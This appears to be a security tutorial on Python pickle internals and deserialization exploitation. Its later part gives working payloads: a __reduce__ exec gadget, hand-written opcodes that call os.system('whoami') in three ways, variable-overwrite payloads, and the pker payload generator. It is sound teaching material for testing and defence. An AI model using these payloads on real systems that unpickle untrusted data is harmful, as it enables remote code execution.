The pickle serialization process

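pickle data is parsed by the PVM (Pickle Virtual Machine), which consists of three parts:

Instruction processor (parsing engine): reads opcodes and their arguments until it reaches `.` (STOP); the value left on top of the stack is returned as the deserialized object
stack: implemented as a Python list; temporarily holds data, arguments, and objects
memo: implemented as a Python dict; provides storage for the whole lifetime of the PVM, keeping already deserialized objects as key-value pairs so they can be referenced again later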
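As a small illustration of the stack and the memo, the following sketch feeds two hand-written protocol 0 byte strings to pickle.loads. The payloads are made up for this example and contain only harmless integer and string pushes.

```python
import pickle

# Two INT pushes followed by STOP: only the value on top of the stack
# is returned, the first push is simply left behind.
top = pickle.loads(b"I1\nI2\n.")
print(top)

# Push a string, store it in memo slot 0 (p0), discard it from the
# stack (0 is POP), then read it back from the memo (g0) before STOP.
via_memo = pickle.loads(b"S'a'\np0\n0g0\n.")
print(via_memo)
```

The second payload only works because the memo outlives the POP, which is the role described for it above.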

opcode

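Different pickle protocol versions produce different opcodes, but pickle is backward compatible: data serialized with protocol v0 can be parsed by any later version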
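A quick way to see both points is to serialize the same object under every protocol the running interpreter supports. This is a minimal sketch; the sample dictionary is arbitrary.

```python
import pickle

data = {"abc": 123, "456": "DEF"}

# One serialized blob per protocol supported by this interpreter.
blobs = {
    proto: pickle.dumps(data, protocol=proto)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
}

# The byte streams differ between protocols, yet the same loads()
# call reads every one of them back to an equal object.
restored = {proto: pickle.loads(blob) for proto, blob in blobs.items()}

for proto, blob in blobs.items():
    print(proto, len(blob), restored[proto] == data)
```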

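Commonly used v0 opcodes:

c: c[module]\n[name]\n, imports the module and pushes the attribute `name` from it onto the stack, roughly equivalent to `from module import name`
o: finds the previous MARK on the stack; the first item after it (must be a callable) is the callable and items 2 through n are its arguments. The callable is invoked (or an object is instantiated) and the return value (or the new object) is pushed
(: pushes a MARK onto the stack
S: S'xxx'\n, creates a string object and pushes it
s: takes the top item as value and the second item as key and adds or updates that pair in the third item (must be a list or dict); key and value are popped, the container stays on the stack with the new or updated entry
V: Vxxx\n, creates a Unicode string object and pushes it
i: i[module]\n[callable]\n, first fetches a global callable, then finds the previous MARK on the stack, combines the items after it into a tuple, and calls the callable (or instantiates an object) with that tuple as arguments; the return value (or the new object) is pushed
d: finds the previous MARK on the stack and combines the items after it into a dict; there must be an even number of items, forming key-value pairs. The MARK and the combined items are popped and the dict is pushed
b: uses the top item (the state, normally a dict of key-value pairs) to set attributes on the second item (an object instance), through __setstate__ if the object defines it, otherwise by updating its __dict__; the top item is popped
t: finds the previous MARK on the stack and combines the items after it into a tuple; the MARK and the combined items are popped and the tuple is pushed
R: pops the top item as the arguments (must be a tuple) and the item below it as the callable, calls the callable with those arguments, and pushes the return value
p: pn\n, stores the top of the stack in memo[n] without popping it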
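The opcodes above can be tried out one at a time with tiny hand-written payloads. The sketch below is only an illustration: the payloads and the choice of math.sqrt and types.SimpleNamespace as harmless targets are assumptions made for this example.

```python
import pickle

# Each payload exercises one or two of the v0 opcodes listed above.
samples = {
    "S": b"S'xxx'\n.",                  # string push
    "V": b"Vxxx\n.",                    # unicode push
    "t": b"(I1\nI2\nt.",                # MARK ... TUPLE
    "d": b"(S'k'\nS'v'\nd.",            # MARK ... DICT
    "s": b"(dS'a'\nI1\ns.",             # empty dict, then SETITEM
    "R": b"cmath\nsqrt\n(I16\ntR.",     # GLOBAL + args tuple + REDUCE
    # GLOBAL + empty args + REDUCE creates the instance, then a dict
    # is built and BUILD copies it into the instance's __dict__.
    "b": b"ctypes\nSimpleNamespace\n(tR(S'x'\nI1\ndb.",
}

results = {name: pickle.loads(payload) for name, payload in samples.items()}

for name, value in results.items():
    print(name, repr(value))
```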

pickletools

pickletools can disassemble opcode into a structured, more readable listing, for example:

import pickle
import pickletools

a = {"abc":123, "456":"DEF"}

ser = pickle.dumps(a, protocol=0)
print(b"opcode: " + ser)

pickletools.dis(ser)

Output:
b'opcode: (dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns.'
    0: (    MARK
    1: d        DICT       (MARK at 0)
    2: p    PUT        0
    5: V    UNICODE    'abc'
   10: p    PUT        1
   13: I    INT        123
   18: s    SETITEM
   19: V    UNICODE    '456'
   24: p    PUT        2
   27: V    UNICODE    'DEF'
   32: p    PUT        3
   35: s    SETITEM
   36: .    STOP
highest protocol among opcodes = 0
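Besides printing a listing, pickletools can also be used programmatically. The following sketch reuses the exact byte string from the output above, walks it with pickletools.genops, and strips the unused PUT opcodes with pickletools.optimize.

```python
import pickle
import pickletools

# The protocol 0 stream shown in the output above.
ser = b"(dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns."

# genops yields (opcode_info, argument, position) for every opcode.
names = [op.name for op, arg, pos in pickletools.genops(ser)]
print(names)

# None of the PUT slots is ever read back with GET, so optimize()
# can drop them without changing the deserialized result.
optimized = pickletools.optimize(ser)
print(optimized)
print(pickle.loads(optimized) == pickle.loads(ser))
```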

Exploiting pickle deserialization

RCE

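The __reduce__() magic method is called during serialization, i.e. by pickle.dumps(), and its return value determines what happens during deserialization, i.e. in pickle.loads():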

def __reduce__(self) -> str | tuple[Any, ...]: ...

It must return a string or a tuple; returning a tuple makes code execution possible:

def __reduce__(self):
    return (callable, (arg1, arg2, ...))

callable is the function to execute and the args are its arguments. A simple exploitation example:

import pickle

class test(object):
    def __reduce__(self):
        s = "print('command1 executed');print('command2 executed')"  # commands to execute
        return (exec, (s,))

ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)
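To see what such a __reduce__() turns into on the wire, the sketch below uses a harmless stand-in (int applied to "42" instead of exec) and lists the opcodes that pickle.dumps() emits. The Demo class is hypothetical and exists only for this illustration.

```python
import pickle
import pickletools

class Demo:
    def __reduce__(self):
        # Harmless stand-in for a payload: loads() will call int("42").
        return (int, ("42",))

ser = pickle.dumps(Demo(), protocol=0)

# The callable is emitted as GLOBAL, its arguments as a tuple, and the
# call itself as REDUCE; nothing about the Demo class is stored.
names = [op.name for op, arg, pos in pickletools.genops(ser)]
print(names)

result = pickle.loads(ser)
print(result)
```

The deserialized value is whatever the callable returns, not a Demo instance, which is why the receiving side does not even need the class definition.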

Variable overwrite

import pickle

key = 1
class test(object):
    def __reduce__(self):
        s = "key=258"
        return (exec, (s,))

ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)

print(key)  # 258

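Hand-written opcode

If exec is filtered or disabled, __reduce__() can no longer be used to run multiple statements, because a single __reduce__() yields only one callable invocation. In that case the opcode has to be written by hand

Variable overwrite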
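As a rough sketch of what hand-written opcode adds, the payload below performs two separate calls inside one pickle stream and returns both results as a tuple. math.sqrt is used purely as a harmless placeholder callable.

```python
import pickle

# Outer MARK, then two independent GLOBAL + args + REDUCE sequences,
# then TUPLE collects both return values into one object.
payload = (
    b"("                       # outer MARK
    b"cmath\nsqrt\n(I16\ntR"   # first call:  math.sqrt(16)
    b"cmath\nsqrt\n(I81\ntR"   # second call: math.sqrt(81)
    b"t."                      # TUPLE, STOP
)

results = pickle.loads(payload)
print(results)
```

Any number of such call sequences can be chained this way without going through exec.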

secret.py:

key = "sxc"

Try to overwrite the variable in secret.py:

import pickle
import secret

opcode = """c__main__
secret
(S'key'
S'258'
db.
"""

print(secret.key)  # sxc
pickle.loads(opcode.encode())
print(secret.key)  # 258
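The same overwrite can be reproduced in a single file. In this sketch the two modules are created in memory with types.ModuleType; the names demo_secret and demo_holder are hypothetical stand-ins for secret.py and for the __main__ module that imported it.

```python
import pickle
import sys
import types

# In-memory stand-in for secret.py.
secret = types.ModuleType("demo_secret")
secret.key = "sxc"

# Stand-in for __main__: a module that holds `secret` as an attribute,
# registered in sys.modules so the c opcode can import it.
holder = types.ModuleType("demo_holder")
holder.secret = secret
sys.modules["demo_holder"] = holder

# c fetches holder.secret, ( ... d builds {'key': '258'}, and b (BUILD)
# merges that dict into the module's __dict__.
opcode = b"cdemo_holder\nsecret\n(S'key'\nS'258'\ndb."

before = secret.key
pickle.loads(opcode)
after = secret.key
print(before, after)
```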

RCE

Commands can be executed in three ways, using R, i, or o

R:

cos
system
(S'whoami'
tR.

i:

(S'whoami'
ios
system
.

o:

(cos
system
S'whoami'
o.
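The three layouts differ only in where the callable and its arguments sit relative to the MARK. The sketch below runs all three forms against math.sqrt, a harmless callable chosen for this illustration, and compares the results.

```python
import pickle

payloads = {
    # R: callable first, then MARK + args + TUPLE, then REDUCE.
    "R": b"cmath\nsqrt\n(I16\ntR.",
    # i: MARK + args first, the callable is named inline after `i`.
    "i": b"(I16\nimath\nsqrt\n.",
    # o: MARK, then the callable, then the args, then OBJ.
    "o": b"(cmath\nsqrt\nI16\no.",
}

results = {name: pickle.loads(data) for name, data in payloads.items()}
print(results)
```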

Instantiating an object

import pickle

class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age

opcode='''c__main__
User
(S'ChuanSao'
S"258"
tR.'''

user = pickle.loads(opcode.encode())
print(user.name, user.age)  # ChuanSao 258

pker

Tools for converting Python source code to Pickle opcode automatically

Tool repository: https://github.com/eddieivan01/pker

pker mainly relies on three special functions, GLOBAL, INST, and OBJ, plus a few required conversions:

GLOBAL corresponds to opcode: c
GLOBAL('os', 'system') corresponds to opcode: cos\nsystem\n

INST corresponds to opcode: i
INST('os', 'system', 'whoami') corresponds to opcode: (S'whoami'\nios\nsystem\n

OBJ corresponds to opcode: o
OBJ(GLOBAL('os', 'system'), 'whoami') corresponds to opcode: (cos\nsystem\nS'whoami'\no

xxx.attr='sxc' corresponds to opcode: (S'attr'\nS'sxc'\ndb

return corresponds to opcode: .
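The mapping above is mechanical enough to mimic with a few string helpers. The sketch below is not pker's implementation; str_op, global_op, inst_op, and obj_op are hypothetical helpers that only handle plain string arguments, written to show how the listed opcode strings are assembled.

```python
import pickle

def str_op(value: str) -> str:
    """Emit an S opcode for a plain string argument."""
    return f"S{value!r}\n"

def global_op(module: str, name: str) -> str:
    """Emit the c opcode, as listed for GLOBAL above."""
    return f"c{module}\n{name}\n"

def inst_op(module: str, name: str, *args: str) -> str:
    """Emit MARK + args + the i opcode, as listed for INST above."""
    return "(" + "".join(str_op(a) for a in args) + f"i{module}\n{name}\n"

def obj_op(callable_code: str, *args: str) -> str:
    """Emit MARK + callable + args + the o opcode, as listed for OBJ."""
    return "(" + callable_code + "".join(str_op(a) for a in args) + "o"

RETURN = "."

# Reproduce the strings from the mapping above (built, never loaded).
inst_text = inst_op("os", "system", "whoami") + RETURN
obj_text = obj_op(global_op("os", "system"), "whoami") + RETURN

# Load only a harmless variant: len('abc') through INST and OBJ.
inst_len = pickle.loads((inst_op("builtins", "len", "abc") + RETURN).encode())
obj_len = pickle.loads(
    (obj_op(global_op("builtins", "len"), "abc") + RETURN).encode()
)
print(repr(inst_text), repr(obj_text), inst_len, obj_len)
```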

Basic usage

pker:

INST('os', 'system', 'whoami')
return

Convert it to opcode with pker.py:

python pker.py < pker
b"(S'whoami'\nios\nsystem\n."

Opcode table:

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8       = b'\x96'  # push bytearray
NEXT_BUFFER      = b'\x97'  # push next out-of-band buffer
READONLY_BUFFER  = b'\x98'  # make top of stack readonly
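The table does not have to be copied by hand: the pickle module exposes these constants, and pickletools.opcodes carries the protocol in which each opcode was introduced. A minimal sketch of looking them up:

```python
import pickle
import pickletools

# The constants from the table are module-level names in pickle.
print(pickle.MARK, pickle.STOP, pickle.REDUCE, pickle.GLOBAL)

# pickletools.opcodes is a list of descriptors with name, code, proto.
by_name = {op.name: op for op in pickletools.opcodes}

# Group opcode names by the protocol that introduced them.
by_proto = {}
for op in pickletools.opcodes:
    by_proto.setdefault(op.proto, []).append(op.name)

for proto in sorted(by_proto):
    print(proto, len(by_proto[proto]))
```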

References:

https://xz.aliyun.com/news/13498

https://xz.aliyun.com/news/7032

https://zixyd.github.io/2024/02/06/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/